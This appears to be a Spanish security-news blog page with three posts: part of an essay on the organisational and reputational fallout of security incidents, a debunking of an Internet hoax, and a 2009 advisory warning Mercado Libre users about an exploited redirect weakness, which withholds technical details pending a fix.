  • En principio, el incidente ha podido ser contra la disponibilidad (algo ha dejado de funcionar), la integridad (algo se ha corrompido) o la confidencialidad (se ha filtrado alguna información). La traducción respectiva de estas casuísticas es que algo se ha parado (lucro cesante), algo funciona mal (también lucro cesante) o alguien sabe algo que no debería (y eso nunca es bueno).
  • De los incidentes sólo nos enteramos cuando alguien lo notifica. Esto quiere decir que el hecho es conocido, al menos a nivel interno de la organización.
  • Los incidentes siempre tienen connotaciones negativas (intrínsecas al concepto, por éso hay gente que prefiere hablar de incidencias, más allá de las definiciones exactas que hagamos de ambos términos), y por tanto son intrínsecamente morbosos, lo que va a propiciar la progresiva expansión de su conocimiento, cuya velocidad será proporcional al impacto percibido.
  • Lo negativo y morboso, una vez que se ha difundido suficientemente, siempre ocasiona críticas, que se van realimentando y creciendo con la difusión. En el caso de la pérdida de confidencialidad estas críticas serán más evidentes, pero en cualquier caso el posicionamiento generalizado tenderá a criticar el hecho de que la organización haya "permitido" que ocurra el incidente, y más cuanto mayores sean las medidas dispuestas por la organización para tratar de evitar que ocurran.
  • Como consecuencia de lo anterior, es previsible un posicionamiento del personal "en contra" de la organización, al menos del grupo de personas conocedoras del hecho.
  • Este posicionamiento social contrario probablemente vaya a provocar reducciones en el rendimiento de la organización, derivadas de la desmotivación provocada.
  • Cuanto mayor sea el impacto del incidente, su morbosidad potencial o el posicionamiento negativo del personal más probabilidades habrá de que su existencia pueda ser conocida fuera de la organización. Obviamente, si la parada o el mal funcionamiento propios del incidente estaban asociados a servicios externos, su conocimiento por parte de entidades externas será mucho más probable.
  • A nivel externo las pautas de propagación del incidente son equivalentes, sustituyendo las personas por entidades y los agentes externos por medios de comunicación, aunque la velocidad de propagación a nivel externo habitualmente es mucho menor.
  • En el caso de incidentes a nivel externo tendremos que considerar también los efectos derivados del tipo de información que haya sido revelada o de los servicios que hayan dejado de estar operativos, y que pueden ir desde pérdidas de competitividad hasta incumplimientos contractuales o regulatorios, con los consiguientes efectos económicos asociados.
  • Todo ello podrá terminar provocando, a nivel externo, pérdida de prestigio o de reputación corporativa.

En definitiva, un incidente de seguridad ha podido ocasionar lucro cesante, pérdida de credibilidad a nivel interno, posicionamiento "social" en contra de la organización, reducción del rendimiento de la organización, pérdida de competitividad, penalizaciones económicas y pérdida de imagen pública. Obviamente, no todos los incidentes de seguridad van a tener tan "catastróficos" efectos, pero la clave es que debemos ser conscientes de que la gestión de los incidentes de seguridad no debe cubrir sólo los efectos directos del mismo, sino que todas estas derivadas deberían ser consideradas a la hora de llevar a cabo una gestión integral del mismo. Si no, corremos el riesgo de resolver el incidente y al mismo tiempo no ser capaces de cortar el flujo de acontecimientos que acabo de señalar...

Autor: Joseba Enjuto
Fuente: Seguridad y Gestión

Mujer queda embarazada ¡de 12 bebés!

Una mujer de Gafsa, Túnez, embarazada de 12 hijos. Si ésta da a luz a todos ellos, seis niños y seis niñas, establecerá un nuevo record del mundo en cuanto a número de hijos en el mismo parto. Si Ud. está leyendo esto necesita prestar más atención. 130 medios creíbles y famosos lo publicaron. No todo lo que se lee en Internet es verdadero, al contrario. Tampoco hubo una mujer con barriga de trapo, Rajko Purovic no existe y los gatos bonsai son el bulo más viejo y conocido de Internet.

Cristian de la Redacción de Segu-Info

25 ago 2009

Debilidad en Mercado Libre siendo explotada

Hemos descubierto que una debilidad en el sitio web de Mercado Libre permite a un usuario malintencionado redireccionar hacia sitios de phishing o la descarga de archivos dañinos (.EXE o .SCR)

La vulnerabilidad está siendo explotada activamente en correos del tipo spam para infectar usuarios desprevenidos.
Desde Segu-Info hemos denunciado a Mercado Libre Argentina por dos canales distintos. En el primer momento hemos denunciado el caso a través del sitio web (el canal que cualquier usuario normal seguiría), hemos recibido la siguiente respuesta:
Evidentemente no se han tomado nuestro denuncia demasiado en serio y no lo han analizado con el cuidado que merece.
En cambio, al denunciar el caso por otro canal, nos han respondido que lo están analizando.

Mientras tanto, queremos alertar a nuestros lectores para que por favor verifiquen cualquier tipo de correo que diga provenir de Mercado Libre, ya que en los mismos se podrían estar manipulando URL que terminan descargando malware al sistema (troyanos en los casos que hemos observado).

Actualmente sólo hemos detectado casos de portugués pero no hay que descartar la posible aparición de correos en otros idioma.

Cuando el caso sea solucionado daremos los detalles.

Actualización 26/09/2009 19:00 hs: Desde Mercado Libre, nos han respondido nuevamente que están en vía de solucionar la vulnerabilidad.

Cristian de la Redacción de Segu-Info